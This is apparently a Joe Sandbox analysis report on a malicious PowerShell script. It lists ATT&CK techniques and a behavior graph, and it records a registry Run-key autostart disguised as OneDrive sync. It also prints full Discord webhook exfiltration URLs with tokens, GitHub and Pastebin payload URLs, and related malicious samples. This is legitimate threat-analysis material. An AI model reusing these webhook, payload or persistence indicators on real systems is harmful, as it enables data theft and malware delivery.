Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534237 Sample: cr_asm_menu..ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 88 46 pastebin.com 2->46 48 raw.githubusercontent.com 2->48 50 discord.com 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Suspicious PowerShell Parameter Substring 2->62 66 2 other signatures 2->66 8 powershell.exe 1 31 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 64 Connects to a pastebin service (likely for C&C) 46->64 process4 dnsIp5 56 discord.com 162.159.137.232, 443, 49926, 49983 CLOUDFLARENETUS United States 8->56 42 C:\Users\user\AppData\...\r422pnl3.cmdline, Unicode 8->42 dropped 44 C:\ProgramData\...\BeginSync.lnk, MS 8->44 dropped 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->70 72 Suspicious powershell command line found 8->72 74 Tries to open files direct via NTFS file id 8->74 76 Powershell creates an autostart link 8->76 17 csc.exe 3 8->17         started        20 conhost.exe 8->20         started        22 attrib.exe 1 8->22         started        24 powershell.exe 7 13->24         started        27 conhost.exe 1 13->27         started        29 powershell.exe 15->29         started        31 conhost.exe 1 15->31         started        file6 signatures7 process8 file9 40 C:\Users\user\AppData\Local\...\r422pnl3.dll, PE32 17->40 dropped 33 cvtres.exe 1 17->33         started        68 Suspicious powershell command line found 24->68 35 powershell.exe 14 13 24->35         started        38 powershell.exe 29->38         started        signatures10 process11 dnsIp12 52 raw.githubusercontent.com 185.199.110.133, 443, 49924, 49927 FASTLYUS Netherlands 35->52 54 pastebin.com 172.67.19.24, 443, 49913, 49918 CLOUDFLARENETUS United States 35->54

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm_menu..ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.137.232
truetrue
    		unknown
    s-part-0023.t-0009.fb-t-msedge.net
    		13.107.253.51
    		truefalse
      		unknown
      raw.githubusercontent.com
      		185.199.110.133
      		truetrue
        		unknown
        pastebin.com
        		172.67.19.24
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996true
            		unknown
            http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                		unknown
                https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
                  		unknown
                  http://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://pastebin.com/raw/sA04Mwk2false
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 0000000B.00000002.1945760008.0000012D8483D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA66000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1778027184.000001AC18FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://discord.compowershell.exe, 00000000.00000002.1757798711.000001AC095A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000000.00000002.1757798711.000001AC0A018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D841B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E44E000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		unknown
                            http://crl.microsPLpowershell.exe, 00000000.00000002.1787154201.000001AC21519000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://discord.com/api/webhooks/129575196622756powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://www.microsoft.copowershell.exe, 00000000.00000002.1786911868.000001AC21300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984040805.0000012D9BFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://discord.compowershell.exe, 00000000.00000002.1757798711.000001AC095B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8525C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://raw.githubusercontent.compowershell.exe, 0000000B.00000002.1945760008.0000012D847D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E9B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 0000000F.00000002.2032175915.000001CA2EA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2F33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2EA58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E92A000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://go.microsmpowershell.exe, 0000000B.00000002.1982642012.0000012D9BE28000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1778027184.000001AC18FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778027184.000001AC190E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://raw.githubusercontent.compowershell.exe, 0000000B.00000002.1945760008.0000012D847D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D847A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E989000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTpowershell.exe, 00000000.00000002.1787154201.000001AC21493000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC09155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC091AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC095B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757798711.000001AC095A2000.00000004.00000800.00020000.00000000.sdmp, cr_asm_menu..ps1false
                                                		unknown
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1757798711.000001AC08F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83D0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83CF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000000.00000002.1757798711.000001AC09155000.00000004.00000800.00020000.00000000.sdmp, cr_asm_menu..ps1false
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1757798711.000001AC08F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D83D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2DEED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://pastebin.compowershell.exe, 0000000B.00000002.1945760008.0000012D84726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D841B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945760008.0000012D8470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E44E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://pastebin.compowershell.exe, 0000000B.00000002.1945760008.0000012D84712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2032175915.000001CA2E8F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      162.159.137.232
                                                      		discord.comUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      172.67.19.24
                                                      		pastebin.comUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      185.199.110.133
                                                      		raw.githubusercontent.comNetherlands
                                                      		54113FASTLYUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1534237
                                                      Start date and time:2024-10-15 18:07:55 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 51s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:cr_asm_menu..ps1
                                                      Detection:MAL
                                                      Classification:mal88.troj.expl.evad.winPS1@20/21@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 77%
                                                      • Number of executed functions: 20
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .ps1

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7632 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • VT rate limit hit for: cr_asm_menu..ps1

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      12:08:48API Interceptor323x Sleep call for process: powershell.exe modified
                                                      17:09:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                      17:09:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      162.159.137.232gabe.ps1Get hashmaliciousUnknownBrowse
                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                  WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                    main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                        https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                          172.67.19.24VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/sA04Mwk2
                                                                          envifa.vbsGet hashmaliciousUnknownBrowse
                                                                          • pastebin.com/raw/V9y5Q5vv

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s-part-0023.t-0009.fb-t-msedge.nethttp://blackenheartbreakrehearsal.com/cb39c694?vupds=66&refer=https%3A%2F%2Fwww.hiclipart.com%2Fsearch%3Fclipart%3Denvelope%2BIcon&kw=%5B%22envelope%22%2C%22icon%22%2C%22transparent%22%2C%22background%22%2C%22png%22%2C%22cliparts%22%2C%22free%22%2C%22download%22%2C%22hiclipart%22%5D&key=186887c3867b1e0f2170b1536aca514c&scrWidth=1920&scrHeight=1080&tz=1&v=24.8.8180&ship=&psid=www.hiclipart.com,www.hiclipart.com&sub3=invoke_layer&res=14.31&dev=rGet hashmaliciousAnonymous ProxyBrowse
                                                                          • 13.107.253.51
                                                                          Payment Receipt 50%Invoicelp612117_(Gerben)CQDM (1).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.51
                                                                          https://appeal-page-review-center.dzy5liuikfosv.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          http://finaltestwebsite.duckdns.org/UpdateVerifyPrss!/RBC/?key=5050d2156464f8b75b40f3d8cba168a3d4aa145eGet hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.51
                                                                          https://currenntlyattyah06.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.51
                                                                          https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fwww.hudl.com%2Fnotifications-tracking%2Ftracker%2FBulkDownloadReady-6151bba290ef2e043c74df7a-6040b153-3f06-4375-9d9d-2976d6f1ac3e-11012597%2Femail%2Flanding%3Fforward%3Dhttps%3A%2F%2Fwww.google.com.sg%2Furl%3Fq%3Damp%2Fs%2Fhosxxrs.com%2F.drogo&data=eJxkkEGL3CAUgH-NcygY9Gl0hKZ0S2qZwy6l0_vyjCYja3RqEjL99yVLoYfeHu87vO99Q2ccBH2WmipgikqtkBrnJQUX8IxaCuHcyXcfTnP3UWnWniWEhmuGDIA1KI1yjVH-fH3--f3y8vrU91_71-fL9Xp5-fZ5fjRTKVMKzVDmT6eli3ksRLIB73FNAWuOeTrYqXZ-rZiJZG6LyYcJ39dbd1vX-0LEEwFLwO773tw2nw5IwOayxjEOuMaSF7pWHN5ingjY9zFUAvbLlt76sudU0P8I6H9TxVvuHIJhYYTApBi09KNGqphkjreCivFIIXRLjTeegtHKq5HjIALlnHFojSZgw4wxEbAJsz_OCjuWumP1RPT_a_8L0SyH4lYTEfYXET3OdwJ2IWBvZXk86vL3u8bXMpU_AQAA___Ij4KF#ask.gcr@zendesk.comGet hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          https://orsag.ru/js/mL8g0GjivX/index.phpGet hashmaliciousUnknownBrowse
                                                                          • 13.107.253.51
                                                                          discord.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.232
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.138.232
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.136.232
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.128.233
                                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                          • 162.159.136.232
                                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                          • 162.159.136.232
                                                                          VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                          • 162.159.138.232
                                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                          • 162.159.128.233
                                                                          raw.githubusercontent.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • 185.199.109.133
                                                                          aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                          • 185.199.110.133
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • 185.199.108.133
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • 185.199.110.133
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • 185.199.111.133
                                                                          na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 185.199.109.133
                                                                          65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • 185.199.109.133
                                                                          Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                                          • 185.199.110.133
                                                                          RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.199.109.133
                                                                          Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                          • 185.199.108.133

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • 104.20.4.235
                                                                          aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.232
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 104.21.53.8
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.138.232
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.136.232
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.232
                                                                          cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.37.123
                                                                          https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • 104.20.4.235
                                                                          aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.232
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 104.21.53.8
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.138.232
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.136.232
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.232
                                                                          cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.96.3
                                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.37.123
                                                                          https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0egabe.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
                                                                          • 185.199.110.133
                                                                          3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          • 162.159.137.232
                                                                          • 172.67.19.24
